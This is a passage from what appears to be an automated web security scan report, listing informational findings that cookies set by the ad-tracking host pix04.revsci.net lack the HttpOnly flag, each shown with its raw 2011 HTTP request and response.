Set-Cookie: rsi_segs_1000000=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; Domain=.revsci.net; Expires=Fri, 11-May-2012 11:15:55 GMT; Path=/
Set-Cookie: rtc_1ITi=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; Domain=.revsci.net; Expires=Fri, 11-May-2012 11:15:55 GMT; Path=/
X-Proc-ms: 2
P3P: policyref="http://js.revsci.net/w3c/rsip3p.xml", CP="NON PSA PSD IVA IVD OTP SAM IND UNI PUR COM NAV INT DEM CNT STA PRE OTC HEA"
Server: RSI
Cache-Control: no-cache
Pragma: no-cache
Expires: Thu, 01 Jan 1970 00:00:00 GMT
Content-Type: application/javascript;charset=UTF-8
Vary: Accept-Encoding
Date: Thu, 12 May 2011 11:15:54 GMT
Content-Length: 1089

/* Vermont 12.4.0-1203 (2011-04-19 22:06:07 UTC) */
rsinetsegs=['D08734_70008','D08734_70010','D08734_70118','D08734_70613','D08734_72078','H07707_11017','H07707_11018','H07707_11028','H07707_11029','
...[SNIP]...

14.119. http://pix04.revsci.net/H07707/b3/0/3/0806180/949356899.js

Summary

Severity:   Information
Confidence:   Certain
Host:   http://pix04.revsci.net
Path:   /H07707/b3/0/3/0806180/949356899.js

Issue detail

The following cookies were issued by the application and do not have the HttpOnly flag set:

The cookies do not appear to contain session tokens, which may reduce the risk associated with this issue. You should review the contents of the cookies to determine their function.

Request

GET /H07707/b3/0/3/0806180/949356899.js?D=DM_LOC%3Dhttp%253A%252F%252Fdealbook.nytimes.com%252F2011%252F05%252F06%252Fpalantir-valued-at-2-5-billion-or-more%252F%26DM_CAT%3DNYTimesglobal%2520%253E%2520Business%2520%253E%2520Dealbook%26DM_REF%3Dhttp%253A%252F%252Fdealbook.nytimes.com%252Fcategory%252Fmain-topics%252Fventure-capital%252F%26DM_EOM%3D1&C=H07707 HTTP/1.1
Host: pix04.revsci.net
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64; rv:2.0.1) Gecko/20100101 Firefox/4.0.1
Accept: */*
Accept-Language: en-us,en;q=0.5
Accept-Encoding: gzip, deflate
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.7
Keep-Alive: 115
Proxy-Connection: keep-alive
Referer: http://dealbook.nytimes.com/2011/05/06/palantir-valued-at-2-5-billion-or-more/
Cookie: NETID01=529777297210b0ea0bebf89fb75e37bd; udm_0=MLvv7qPvYS5npS5IdtJQSJvhPx/j4C3JXuteOzZrowSCWmqpgTbMk8TbSMyqxlmLyxECNpR02+gPiezqOi+5yDykHuJcd6JJdoqLT8+i34bQnPvlwJigh1mUBVMxT2jfIxNwiDsUjsIFhNY13veukem47waFuIaQqYRyamjEvbzrtYAFMkMLhz8IyAfDJDgGAxRmbCiIOI/di7VuccpOkCFmEfIjhk5PRY/BVcGMxjjd26Gh4r3LbiC/DDBiBEkhq8JEqKIFkLwkhRrrOal9LlyDJN56E1oZkKstcU4ls+6wuVbuB+4+40PT0qOQ8ovh6fTDhw1dZ5SWaGL6x6vGDshNHJvL1UajC5eKoBIJ2xSFpyDcj4+w77js62NAT7kEPYmvqQoshwPyf2vOCimLsUgUFNNxIGmZPYzZs4PiPM+vVu1dcss0McJQrn3DO1uknbOYHQiwl9wlvyRQm0rbkjW9LIrwSiZCNdEo0ad0FuCYBgpXiDG66lxpMUq0lKVhL3YyhyI/Oj+MuDOYFK+dW/6zM7b1mda0br2f4dGKPL3vg4qXPKYWMdCSKP0Xg355P74y; NETSEGS_H07707=d303c7ec11fd6a67&H07707&0&4df0add0&0&&4dca5d68&b4e1d2b1d00ab5a43b3cb0c8a26d04a4; rsi_segs_1000000=pUPFOEPB7nMME594u+yjy0mav02iTsILcFItXRgoUTnlu1I0fvTx4Uzo/UWd5q+nTGoaNabDNSBKewcX6S7TBaIk6jd0+MBxvnAK9JboqoHpyEHF6wY/rKVe6EvTibweFOyKXr44rf06GLp3ZYgcvJ9ta/eFouLHU1W2bIozA/yq0E4w9CipCXek7DYBMQmdgvtLtf1geEgQccYWFr/z3xFYnvfSb3B3EUgPFJE5QVeopqyarGbY9Q==; rtc_GomL=MLuB26mvt4kSQA8cBQ5Xp5GzJe3015EFoD/95teJL+E3r/9Dz2ruFLBtozaNrNCnxTv/CPBK4vxuKCe62VWohhBnMq1x/q0J22fzirjvhsYDeU2ou1Z4c7QpH/iIvZSk4jupAadTP3jJwOGhjpBlL0D/pb7eB9//K6gCqUY7F9avCH3SeUbAKZ8SaMucKXkSP0/UCmQq5H3prJ3dI4SCV2jsz357yIBJ1Wmb9VWkVixIXqd2sv4V4HAIcSCMcLipNC98B0t/No+oQiekPIcQ2jiRXxTdKUdmHxepDyCKFkkH2RhtOjE3aHseBOExJGngyl45Qk65yXrEpCF5Z/4S

Response

HTTP/1.1 200 OK
Server: Apache-Coyote/1.1
Set-Cookie: rtc_GomL=; Domain=.revsci.net; Expires=Thu, 01-Jan-1970 00:00:10 GMT; Path=/
Set-Cookie: rsi_segs_1000000=; Domain=.revsci.net; Expires=Thu, 01-Jan-1970 00:00:10 GMT; Path=/
Set-Cookie: rsi_segs_1000000=pUPNOE/FLnIQlrWdI00WdC2M5e+iH53YApI1XQ1VhIIo+uLeylJ24IzIDUVJoi+vnOqW9W/ZJZlixYxplxRO0W1JvkWpOEh6HITQG7wwtuWBy03DV2z/vqwD6stqsWyVtod2+y613Cs++rbRUfxEWWduyC6rDKAMyfYjERD/tzztSnr+CAtqaB92apUcZdvwPRCFqDZWn9No0zlL4k/buv/yOKhRX9tiffPrBsrIQ/ZRWwIlm22f8I7/9F5nFFM=; Domain=.revsci.net; Expires=Fri, 11-May-2012 11:28:19 GMT; Path=/
Set-Cookie: rtc_66oE=MLuB26mvt4kSQA8cBQ5Xp5GzJe3015EFoD/95teJL+Err//DyFLu1LNxozaNrNCnxTv/CPBK4vwUC37I+Pw2DxDH9eVMUC9zB1mGK9JGee2kZ/rkxh9ZhsvGXmyp1GIOejNCcp29JzcATN8GDRgxtWQLVIrfqXjLYkKxH2Wkot1CcCcHEV+imu9mtVtV+fEsoPqb8Sx0EexVQw7FtCen+/ihLI/zuRtzoISDJn1i335fn+91HWdFyleqRqt2FFYHQRSR0n0huHL1bBQL7IuGA/Tq/HBv4FOro1WSc6yqw+2xjgQcQAAMVLamZ29iRGSHkD6u/g3+COdPKCC+G/59; Domain=.revsci.net; Expires=Fri, 11-May-2012 11:28:19 GMT; Path=/
X-Proc-ms: 1
P3P: policyref="http://js.revsci.net/w3c/rsip3p.xml", CP="NON PSA PSD IVA IVD OTP SAM IND UNI PUR COM NAV INT DEM CNT STA PRE OTC HEA"
Server: RSI
Cache-Control: no-cache
Pragma: no-cache
Expires: Thu, 01 Jan 1970 00:00:00 GMT
Content-Type: application/javascript;charset=UTF-8
Vary: Accept-Encoding
Date: Thu, 12 May 2011 11:28:19 GMT
Content-Length: 1119

/* Vermont 12.4.0-1203 (2011-04-19 22:06:07 UTC) */
rsinetsegs=['D08734_70010','D08734_70105','H07707_10872','H07707_10950','H07707_10954','H07707_10987','H07707_11017','H07707_11018','H07707_10678','
...[SNIP]...

14.120. http://pix04.revsci.net/H07707/b3/0/3/0806180/955065746.js

Summary

Severity:   Information
Confidence:   Certain
Host:   http://pix04.revsci.net
Path:   /H07707/b3/0/3/0806180/955065746.js

Issue detail

The following cookies were issued by the application and do not have the HttpOnly flag set:

The cookies do not appear to contain session tokens, which may reduce the risk associated with this issue. You should review the contents of the cookies to determine their function.

Request

GET /H07707/b3/0/3/0806180/955065746.js?D=DM_LOC%3Dhttp%253A%252F%252Fdealbook.nytimes.com%252F2011%252F05%252F03%252Fprivate-equity-titans-finds-common-ground%252F%26DM_CAT%3DNYTimesglobal%2520%253E%2520Business%2520%253E%2520Dealbook%26DM_EOM%3D1&C=H07707 HTTP/1.1
Host: pix04.revsci.net
Proxy-Connection: keep-alive
Referer: http://dealbook.nytimes.com/2011/05/03/private-equity-titans-finds-common-ground/
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/534.24 (KHTML, like Gecko) Chrome/11.0.696.65 Safari/534.24
Accept: */*
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: NETID01=8e1e1163986432e20f9603df067356d2; NETSEGS_I10982=bff01c00ddc153c5&I10982&0&4decdd8d&0&&4dc76d7a&271d956a153787d6fee9112e9c6a9326; NETSEGS_E05516=bff01c00ddc153c5&E05516&0&4decf25d&8&11797,12348,12360,12390,12566,12572,11854,50049&4dc75d7d&271d956a153787d6fee9112e9c6a9326; NETSEGS_J06575=bff01c00ddc153c5&J06575&0&4decf417&0&&4dc77286&271d956a153787d6fee9112e9c6a9326; NETSEGS_F07607=bff01c00ddc153c5&F07607&0&4decf45e&6&10124,10098,10078,10053,10100,10143&4dc74a5e&271d956a153787d6fee9112e9c6a9326; NETSEGS_G08769=bff01c00ddc153c5&G08769&0&4decfa31&2&10433,10524&4dc75824&271d956a153787d6fee9112e9c6a9326; NETSEGS_G07608=bff01c00ddc153c5&G07608&0&4decfa40&1&10009&4dc75095&271d956a153787d6fee9112e9c6a9326; NETSEGS_K08784=bff01c00ddc153c5&K08784&0&4decfa7c&0&&4dc76015&271d956a153787d6fee9112e9c6a9326; NETSEGS_J05531=bff01c00ddc153c5&J05531&0&4dee240a&0&&4dc8b573&271d956a153787d6fee9112e9c6a9326; NETSEGS_J09847=bff01c00ddc153c5&J09847&0&4dee247a&0&&4dc8a2b6&271d956a153787d6fee9112e9c6a9326; NETSEGS_B08725=bff01c00ddc153c5&B08725&0&4def8d7d&5&10011,10030,10070,50085,50150&4dc8d181&271d956a153787d6fee9112e9c6a9326; NETSEGS_K05540=bff01c00ddc153c5&K05540&0&4def8f97&10&10572,10573,10342,10343,10391,10395,10432,10537,10538,10166&4dc8d904&271d956a153787d6fee9112e9c6a9326; NETSEGS_K05539=bff01c00ddc153c5&K05539&0&4def8f9d&1&10592&4dca02d1&271d956a153787d6fee9112e9c6a9326; NETSEGS_H10972=bff01c00ddc153c5&H10972&0&4def8fc2&0&&4dc9f632&271d956a153787d6fee9112e9c6a9326; NETSEGS_J07717=bff01c00ddc153c5&J07717&0&4df0a86e&0&&4dcb3d30&271d956a153787d6fee9112e9c6a9326; NETSEGS_H07707=bff01c00ddc153c5&H07707&0&4df0a87c&0&&4dca5d68&271d956a153787d6fee9112e9c6a9326; NETSEGS_H07710=bff01c00ddc153c5&H07710&0&4df0b07e&0&&4dca8ab1&271d956a153787d6fee9112e9c6a9326; rsiPus_qbvO="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"; 
rsi_us_1000000="pUMV4ylDPxYY7RUCt3RYS68XU2Z/uOqvJR0SNgYO9rFAJiyyAu+FxS1Z30ODwyEFcoEx3T1Eetffz3Mf20XkwCrwYFLZZJxtyzGTJat2XTjlIN8P+hQPSL5K9zsL+kusRTvgKYlhihBhqZKK6GKen73oVAV9BWGkbl//D/fTGMFsID28cq6D7duOtAY3S7ThixmzbEOMxOHaa0VO3cDkKGVKS9qitOaUYlvgkLY1MKDOtODLrFUkILMlSRpCe7+47YCa4Yvgfmntw+kxPheKq6wDe8Fd8gOqjo+YsYcbcBetJ/UlUtydzNb+VQfdT8dEj/2h41IZ5vmY/5vsAZW1gUJs43Y9iklV1tAb9jY/G3Rk4zy39xByfOtBbqnZZm8zU97WhpjXwdwTrCSEuJ4CNdY/fhO3f+aPVPTKG9RnYRL0QJ4kFGhThODFPtf76e2qY1SQ9slSHrnY01CTJTrHMxySjJKQAVAr1obI8ilzYsPlaT1OSvYVS9TK9PoGrO5Jx5bXw/zwwE6Wrxwt7KjBiQjMb8pc2/6daLQ71r2XwEeaREz3clc3XYbmXIZKYmXXjpSqe6jB0kwcSkFst/ViDZpkDsFltV4ci5YQ/eJMqmyKrF/0uup6pq93xJKQibeBPvkCxBjBIGLPE6+meOzdSPUPxAyoXPah9kyi7C70w/Ic06E82HDgxMfptenJH+QxMcJPPGsyFAVT+6SBuOjuKJ5KYDNUBXyxL2dg7B2oqDAiqh1W+megWtR3XoJXxE+b3k70BKlvT5YvEuZ0/RALqrZKe/52guDCx1yv8IEqB3NuIb5M9E0P1eLplz4HhYGMt1XJa6PPDxd4ljqvSFEQClJtagh9UzDEFg6Cb5LdDadrKiwtHRl62r3F/lJB8Wq3syJAxzEPLO4bM0VnXvq5faJnoE+6gBD5yjyVDaOWRfQzLGIWkNHa+f2KJvAyTQlC4oHYQZOGM/cVc3WrnRQmj1KDwCk/46Dq6gu9fFpETdaKz7DpE5AVcVASeUiRu6t0E9gdbxRFlQnHfQxlj0O0yv/8sVDJfLtBv7VEv6KvS85d/vyrS+3/lJtowlLX877yZqlnDrYhsgIzJ/B2kGU/Y2tWcJtJNzrSLvL6uC6zAE3YCN+2b8ZfetlvToWWUxLm+kOAX5sNQa84+z+Y7BiXKA28ArWYuR2BzhZYqV+lNsl8IuYWHrQEhBevE6yTgfXBfZ5ZWDuef3muciM4uxq9eRevsktzwd4ZolhUro4q9RDXzP+z/Jt3SlkekF3F1UyZn5rEt9sK3VhPrPz7bFs0pGO/fShWwUhEJGkkGofDmr7oO9xVS0wlWlGR+HiZLLiNXtFztdl/InifBdzZrv7tEgPT/Ekl1qqx4lzM76Hls1fjGRalSthbIGWedXoj3t9T64fqUJnYWdom7ygUV4OI6Uek4g2aJV2sE2HBrV7ibQMfkHW6H2qlf/AvGzXk5juIW8AOsU6N3bJugxzerwleYqkN4SEXHO2TsUUB2Hii30ULmVN5KVwl4AT7t07WbQfIgUgh+J4zgAJSZ1//mvY7cAo2t7r+WZ+3UqK9EVFlB88NDlOgh4Jm3SdKvwyEx2VIxC8FQZezWpUIHfmHUohseSJ3s3QYI0FyZt+UimHMdHcAt0unq75eibm7XCXgvJjZ8QEa2uTso9gthoSRwjtm4zJD8KuDs9Dol9dL10gwkePtd9XjMMl1IiMfHEGPMzYrTXatfWNnptioKHatYztwbz3JzwC1e1SaBMwSq2wE51biaKnVTIX7gjw1dfMUEcH+SSwe4EKfaZDW3Y8jNtoFzFv7v+gK3Q=="; rtc_7N2M=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; 
NETSEGS_E05510=bff01c00ddc153c5&E05510&0&4df0b096&0&&4dc9f625&271d956a153787d6fee9112e9c6a9326; rsi_segs_1000000=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; udm_0=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

Response

HTTP/1.1 200 OK
Server: Apache-Coyote/1.1
Set-Cookie: rtc_7N2M=; Domain=.revsci.net; Expires=Thu, 01-Jan-1970 00:00:10 GMT; Path=/
Set-Cookie: rsi_segs_1000000=; Domain=.revsci.net; Expires=Thu, 01-Jan-1970 00:00:10 GMT; Path=/
Set-Cookie: rsi_segs_1000000=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; Domain=.revsci.net; Expires=Fri, 11-May-2012 11:40:06 GMT; Path=/
Set-Cookie: rtc_u0Bh=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; Domain=.revsci.net; Expires=Fri, 11-May-2012 11:40:06 GMT; Path=/
X-Proc-ms: 2
P3P: policyref="http://js.revsci.net/w3c/rsip3p.xml", CP="NON PSA PSD IVA IVD OTP SAM IND UNI PUR COM NAV INT DEM CNT STA PRE OTC HEA"
Server: RSI
Cache-Control: no-cache
Pragma: no-cache
Expires: Thu, 01 Jan 1970 00:00:00 GMT
Content-Type: application/javascript;charset=UTF-8
Vary: Accept-Encoding
Date: Thu, 12 May 2011 11:40:06 GMT
Content-Length: 1269

/* Vermont 12.4.0-1203 (2011-04-19 22:06:07 UTC) */
rsinetsegs=['D08734_70008','D08734_70010','D08734_70118','D08734_70613','H07707_10872','D08734_72078','H07707_10950','H07707_10954','H07707_10987','
...[SNIP]...

14.121. http://pix04.revsci.net/J07717/b3/0/3/1003161/451564742.js

Summary

Severity:   Information
Confidence:   Certain
Host:   http://pix04.revsci.net
Path:   /J07717/b3/0/3/1003161/451564742.js

Issue detail

The following cookies were issued by the application and do not have the HttpOnly flag set:

The cookies do not appear to contain session tokens, which may reduce the risk associated with this issue. You should review the contents of the cookies to determine their function.

Request

GET /J07717/b3/0/3/1003161/451564742.js?D=DM_LOC%3Dhttp%253A%252F%252Fwww.ft.com%252Findepth%252Fprivateequity%253FFTSectionCode%253D29dep%2526FTPageCode%253D29invbnk%2526FTP%253Dnull%2526FTR%253Dnull%2526FTI%253Dnull%2526FTC%253DUSA%2526FTCS%253Dnull%2526SubsLevel%253Danon%2526dfp_site%253Dftcom.5887.ftfm%2526dfp_zone%253Dprivate-equity%2526_rsiL%253D0%26DM_EOM%3D1&C=J07717 HTTP/1.1
Host: pix04.revsci.net
Proxy-Connection: keep-alive
Referer: http://www.ft.com/indepth/privateequity
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/534.24 (KHTML, like Gecko) Chrome/11.0.696.65 Safari/534.24
Accept: */*
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: NETID01=8e1e1163986432e20f9603df067356d2; NETSEGS_H07710=bff01c00ddc153c5&H07710&0&4de96140&0&&4dc3b759&271d956a153787d6fee9112e9c6a9326; NETSEGS_I10982=bff01c00ddc153c5&I10982&0&4decdd8d&0&&4dc76d7a&271d956a153787d6fee9112e9c6a9326; NETSEGS_E05516=bff01c00ddc153c5&E05516&0&4decf25d&8&11797,12348,12360,12390,12566,12572,11854,50049&4dc75d7d&271d956a153787d6fee9112e9c6a9326; NETSEGS_J06575=bff01c00ddc153c5&J06575&0&4decf417&0&&4dc77286&271d956a153787d6fee9112e9c6a9326; NETSEGS_F07607=bff01c00ddc153c5&F07607&0&4decf45e&6&10124,10098,10078,10053,10100,10143&4dc74a5e&271d956a153787d6fee9112e9c6a9326; NETSEGS_G08769=bff01c00ddc153c5&G08769&0&4decfa31&2&10433,10524&4dc75824&271d956a153787d6fee9112e9c6a9326; NETSEGS_G07608=bff01c00ddc153c5&G07608&0&4decfa40&1&10009&4dc75095&271d956a153787d6fee9112e9c6a9326; NETSEGS_K08784=bff01c00ddc153c5&K08784&0&4decfa7c&0&&4dc76015&271d956a153787d6fee9112e9c6a9326; NETSEGS_J05531=bff01c00ddc153c5&J05531&0&4dee240a&0&&4dc8b573&271d956a153787d6fee9112e9c6a9326; NETSEGS_J09847=bff01c00ddc153c5&J09847&0&4dee247a&0&&4dc8a2b6&271d956a153787d6fee9112e9c6a9326; NETSEGS_H07707=bff01c00ddc153c5&H07707&0&4def57e5&0&&4dc8e6f8&271d956a153787d6fee9112e9c6a9326; NETSEGS_B08725=bff01c00ddc153c5&B08725&0&4def8d7d&5&10011,10030,10070,50085,50150&4dc8d181&271d956a153787d6fee9112e9c6a9326; udm_0=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; NETSEGS_K05540=bff01c00ddc153c5&K05540&0&4def8f97&10&10572,10573,10342,10343,10391,10395,10432,10537,10538,10166&4dc8d904&271d956a153787d6fee9112e9c6a9326; NETSEGS_K05539=bff01c00ddc153c5&K05539&0&4def8f9d&1&10592&4dca02d1&271d956a153787d6fee9112e9c6a9326; rsi_segs_1000000=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; NETSEGS_H10972=bff01c00ddc153c5&H10972&0&4def8fc2&0&&4dc9f632&271d956a153787d6fee9112e9c6a9326; rtc_d44E=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; rsiPus_Q2bN="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"; 
rsi_us_1000000="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"

Response

HTTP/1.1 200 OK
Server: Apache-Coyote/1.1
Set-Cookie: rtc_d44E=; Domain=.revsci.net; Expires=Thu, 01-Jan-1970 00:00:10 GMT; Path=/
Set-Cookie: rsi_segs_1000000=; Domain=.revsci.net; Expires=Thu, 01-Jan-1970 00:00:10 GMT; Path=/
Set-Cookie: rsi_segs_1000000=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; Domain=.revsci.net; Expires=Fri, 11-May-2012 11:03:16 GMT; Path=/
Set-Cookie: rtc_yv6E=MLvv+TMxJohmprbr/FOrg2mNvsIotYBFSXnXGp85AnkmVGe7pmFq+vDasKu3UCzJrIUFRJjHM3y24XIoxzWYaHpPK/ANRh0tzzRwZjFkB2TqggeS4W92jOOrAKTjVv7a9EbCfaDI/8+32MZIvKm8ZIgUvOYW47gPLRHGmUXq0pqmz0yG/4aszFb2p2Jhtglky0gn0Vcq2KOg4iWIc9DK5ItjIdjLIug+LsA9elvc/D8BYJClYOAVjs3imp6qNSc7Wan20jUBNKfKiEyZHjkXJAyDARylN0liiVTbNphhnJafqgzUj2uDOWSxgzaS7YBbLOeT2a10R1KDEK2tI1ULUFLZ6vksyczwgMc4P9mQWrU2IYAot4JiARUindoKhLT8FDwzyFf3b8P3QKAKVr9n1MYNvaIhDqDS7FjXkUCmWo0VV76+KOwwqoe9t2rUvF/3e1Bl424TwfmlaYZfWDjz9O2acj9pVn/R9EwywmAafu10Eqm+w8GRbZdDOcVHhor12OrgNPlNHvtWiQc9n1Nr9qLH3n/J+Cl55VgYvG+eXZyFDSyQG4li2kHUzC9Hn1nAmVVzJRlan3c1t21dO7V6iaw/ZX59p90/k26RlUady6utaV14L0Rm8x7pp8nxx/r4VPIasCa4DsbIuBJyphJNLIbOF/8pvWU/Oy8cLZ0bUCg0ME/KOpbsjpChdO8CmBUHo5cAhy1sMJIytoA6ARyzrx3SVcOaHWqFv5i5mTuc+FxBTAvhXnLogmTHGxoW2gSVeKSYa1ZGg2oxkSbbaKA1ALrXo0Le6PoDrfzaNtMRXcNvGUtfb8R8zmmC1L04bQNv6/g5b8EfG2xDfv2pVfVOLo6ff/0nSR0l1DtGtv0yyNSdtp1uh6xJ4eJ8pBGmaTMO+t/mPRmN9RQREmOdhsx0zsTxAN9vcsieYqfC/ZpBcc2sOYG1hnnILYTI3wKW0/V4cUDbt6GagbpZv6cD3rFnXObJRXQ7Es13wCofsd754dM3qXNlFSC9ee6PPok4ndQGYxmmoxFc+ARGS1GZ/dkc2xctQvaSv/CvRi4Qt+bmmi+mR81bkRpel83DoRs/5ELDLpRC3zlCFVZ9fZYqH+vm9k/vEW2fNIEyJ2R5aGEHJUfjvGYTWg8nS9ppmlXjNEv8ac9foSe8ZVxuhwRQKPzntFh0n5/dnBitioeRcQeS5qWkLlhCFs1O2rhRzjnJJz+i8NAL/wYWLZU0wEMsz/gFNnfcfBFtVt1XAIfz5XK1d1r9gfAVC08rdymeWF8ZzCitGsS5nw6FYA8FjzIhZlI3gAPupBvDfrlrDt5hiZaPecub/at7V+PzlIBjgA5fRdlwg04RI5GxPrHPNYVfwPvwUR+kcfb5otEILpN0hI738J9IMQVitoW2LAnLCDEM6YDnGOHTvDu1TI7N5KgIkf3itmXOfi9p0nMJtn2WLCO/zEUFowlRDdIH4+1GeH6zx0nyfySJPRE1wAqMQNUzWK4JMunDeNy/xc6jfdcknGS/bJBg9DDgDQ+Zh8ImEEaTAi64LpMauB47hF5XtpnFr4HrjIlBowd3Zp14k/MBFKrQqttAR2anyiuOGFv8LGu1taKado92WukRuSAWw2neiHKwPdxfG0jITETHTJFmQzOUc1iv4Tlh7TpBg40qHwsQTxTvtLohFVW/yCvn8A225IQYTu+O1M8gAQ0ryRVZSjgTPdsGu7XxU+q5Dvkjgci6XfnmIME2+04f6nzGhtpGDVIddPVYoAd8o+YgbMJ96KoonoXqCNOgnTv5QUoSVdMU8/yIkoR8z3e4SCZLVmvGIBtj1IxcB0QRpdRVWJCB8iVLMj/GslP7i/IuygkF+tBEvKDh/lsBHUhb/VBkKgjh4JgGKKNJeukilSnLZ3k1Zt7djl/19oIuSbSEBn+naO5w5Ym8k0L02qGVRS+ErEvc1yGUct+k8Wq9aoP/+MneYgLVVj6MQAEMwjfhZYOgyA7
a9NLfk9P4Yf+hYo1D95lCnR22jjV9nx64TzclzupEL4LskhRTAL/iUEb14gttjbvxwO+D/cA0/hmjrlNdc1dtsTzcox5k0pysX4GVTH5LWybuRkMWXKrVBvro6DxST3juwPdYJ8km/Tzgx0ytbhwHh0609yJeds9yt2/QL55qiQrAUo/9pEijNIdJ9nW9avBvKJ5s1Nz1hRK0L3LSY9ttZiKddQ1sEChcUdh/CawI+NJXaHkliroPnVPCxb6lYkgtQNW+VZlL8mB44aVgUgFzZJ/d/Iz4OKu98BrFo35OXlkQDJF2Rq5NQ+dJOHdu75GE2He0G2wtA9Yq05LC+hCnJZmfeyIbXUuAtTrbkfIMwdXBCMOfSqjeISv1uG+Zhi+zcdaOjYrIJMB0hucWT83KDaAGuQkFHWJ2T80zC2+LtpLfv6IimDkq/Gpgc/CpkZXY8yn+SvEQhPjFt1ncahj8pJZBgbYgqmHP3XsfGZxfcmHEHvCTiIy5js2rxOHiGUe4idVEUYt/fJHDCIOvgQMCdKBR6oJbK++XUUWu+EXeHad0VfO7mRpDFNb3fau6ciWxx6+XehQKJHyubd9ZDNXDOaevL43L1iEWvIbsZeA4Rp9HOT74ml9QcT89kpF8YM4H4rwDH4cvaQIdew==; Domain=.revsci.net; Expires=Fri, 11-May-2012 11:03:16 GMT; Path=/
Set-Cookie: NETSEGS_J07717=bff01c00ddc153c5&J07717&0&4df0a874&0&&4dcb3d30&271d956a153787d6fee9112e9c6a9326; Domain=.revsci.net; Expires=Thu, 09-Jun-2011 11:03:16 GMT; Path=/
X-Proc-ms: 6
P3P: policyref="http://js.revsci.net/w3c/rsip3p.xml", CP="NON PSA PSD IVA IVD OTP SAM IND UNI PUR COM NAV INT DEM CNT STA PRE OTC HEA"
Server: RSI
Cache-Control: no-cache
Pragma: no-cache
Expires: Thu, 01 Jan 1970 00:00:00 GMT
Content-Type: application/javascript;charset=UTF-8
Vary: Accept-Encoding
Date: Thu, 12 May 2011 11:03:16 GMT
Content-Length: 930

/* Vermont 12.4.0-1203 (2011-04-19 22:06:07 UTC) */
rsinetsegs=['J07717_10702','J07717_10435','J07717_10296','J07717_10134','J07717_10145','J07717_10449','J07717_10555','J07717_10985'];
var rsiExp=new
...[SNIP]...

14.122. http://pix04.revsci.net/K05539/b3/0/3/1003161/248479722.js

Summary

Severity:   Information
Confidence:   Certain
Host:   http://pix04.revsci.net
Path:   /K05539/b3/0/3/1003161/248479722.js

Issue detail

The following cookies were issued by the application and do not have the HttpOnly flag set:

The cookies do not appear to contain session tokens, which may reduce the risk associated with this issue. You should review the contents of the cookies to determine their function.

Request

GET /K05539/b3/0/3/1003161/248479722.js?D=DM_LOC%3Dhttp%253A%252F%252Fwww.bloomberg.com%252Fnews%252F2011-05-05%252Fpingpong-returns-with-partners-from-sarandon-to-elle-to-hedge-fund-match.html%253FNI%252520TAGS%253DALLTOP%252526SPNATOP%252526SPWWTOP%252526GENTOP%252526USTOP%252526OLYTOP%252526TOP%252526WWTOP%252526%2526_rsiL%253D0%26DM_EOM%3D1&C=K05539 HTTP/1.1
Host: pix04.revsci.net
Proxy-Connection: keep-alive
Referer: http://www.bloomberg.com/news/2011-05-05/pingpong-returns-with-partners-from-sarandon-to-elle-to-hedge-fund-match.html
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/534.24 (KHTML, like Gecko) Chrome/11.0.696.65 Safari/534.24
Accept: */*
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: NETID01=8e1e1163986432e20f9603df067356d2; NETSEGS_H07710=bff01c00ddc153c5&H07710&0&4de96140&0&&4dc3b759&271d956a153787d6fee9112e9c6a9326; NETSEGS_I10982=bff01c00ddc153c5&I10982&0&4decdd8d&0&&4dc76d7a&271d956a153787d6fee9112e9c6a9326; NETSEGS_E05516=bff01c00ddc153c5&E05516&0&4decf25d&8&11797,12348,12360,12390,12566,12572,11854,50049&4dc75d7d&271d956a153787d6fee9112e9c6a9326; NETSEGS_J06575=bff01c00ddc153c5&J06575&0&4decf417&0&&4dc77286&271d956a153787d6fee9112e9c6a9326; NETSEGS_F07607=bff01c00ddc153c5&F07607&0&4decf45e&6&10124,10098,10078,10053,10100,10143&4dc74a5e&271d956a153787d6fee9112e9c6a9326; NETSEGS_G08769=bff01c00ddc153c5&G08769&0&4decfa31&2&10433,10524&4dc75824&271d956a153787d6fee9112e9c6a9326; NETSEGS_G07608=bff01c00ddc153c5&G07608&0&4decfa40&1&10009&4dc75095&271d956a153787d6fee9112e9c6a9326; NETSEGS_K08784=bff01c00ddc153c5&K08784&0&4decfa7c&0&&4dc76015&271d956a153787d6fee9112e9c6a9326; NETSEGS_J05531=bff01c00ddc153c5&J05531&0&4dee240a&0&&4dc8b573&271d956a153787d6fee9112e9c6a9326; NETSEGS_J09847=bff01c00ddc153c5&J09847&0&4dee247a&0&&4dc8a2b6&271d956a153787d6fee9112e9c6a9326; NETSEGS_B08725=bff01c00ddc153c5&B08725&0&4def8d7d&5&10011,10030,10070,50085,50150&4dc8d181&271d956a153787d6fee9112e9c6a9326; NETSEGS_K05540=bff01c00ddc153c5&K05540&0&4def8f97&10&10572,10573,10342,10343,10391,10395,10432,10537,10538,10166&4dc8d904&271d956a153787d6fee9112e9c6a9326; NETSEGS_K05539=bff01c00ddc153c5&K05539&0&4def8f9d&1&10592&4dca02d1&271d956a153787d6fee9112e9c6a9326; NETSEGS_H10972=bff01c00ddc153c5&H10972&0&4def8fc2&0&&4dc9f632&271d956a153787d6fee9112e9c6a9326; NETSEGS_J07717=bff01c00ddc153c5&J07717&0&4df0a86e&0&&4dcb3d30&271d956a153787d6fee9112e9c6a9326; rsiPus_UVQe="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"; rsi_us_1000000="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"; NETSEGS_H07707=bff01c00ddc153c5&H07707&0&4df0a87c&0&&4dca5d68&271d956a153787d6fee9112e9c6a9326; udm_0=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; 
